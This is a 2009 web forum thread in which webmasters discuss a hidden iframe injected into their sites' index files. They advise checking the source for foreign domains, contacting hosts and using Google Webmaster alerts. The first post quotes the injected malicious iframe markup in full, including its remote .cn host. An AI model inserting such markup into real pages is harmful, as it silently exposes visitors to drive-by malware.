1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

Iframe worms attack

Discussion in 'Security' started by ric6000, Apr 10, 2009.

Hello, just let you know that all my websites was infected by an iframe yesturday.

In all my index files I have found this :
    <iframe src="http://mixante.cn/in.cgi?income52" width=1 height=1 style="visibility: hidden"></iframe>

Look in the source code of your website for ".cn" they alos use other domains.

This worm is very dangerous for webmasters because if you don’t react immediately you can be listed by Google as “This site can harm your computer”. If that happened it will ruin your traffic in a second.

I have found this article about this worms.

Cheers,

ric6000, Apr 10, 2009 IP
  2. SSANZ

SSANZ Peon

Best Answers:
    Have you questioned yourself as to why your pages got a javascript injected into them?

There is a higher breach in your hosting chain :p The server has been breached.

SSANZ, Apr 10, 2009 IP
  3. indiarahul

indiarahul Peon

Best Answers:
    worst virus i had to format twice

any solution

indiarahul, Apr 14, 2009 IP
  4. jackio

jackio Banned

Best Answers:
    That is an old malware, newer ones are coding their javascript and getting similar to google analytics format, so it can disguise better. Contact your hosting company and tell them they could be infected.

jackio, Apr 18, 2009 IP
  5. seolion

seolion Active Member

Best Answers:
    I faced it in the past. Using Google's webmaster central, luckily I came to know about this in a day's time and cleaned it up. Add your sites to Google webmaster central to get alerts about such items on your site.

seolion, Apr 19, 2009 IP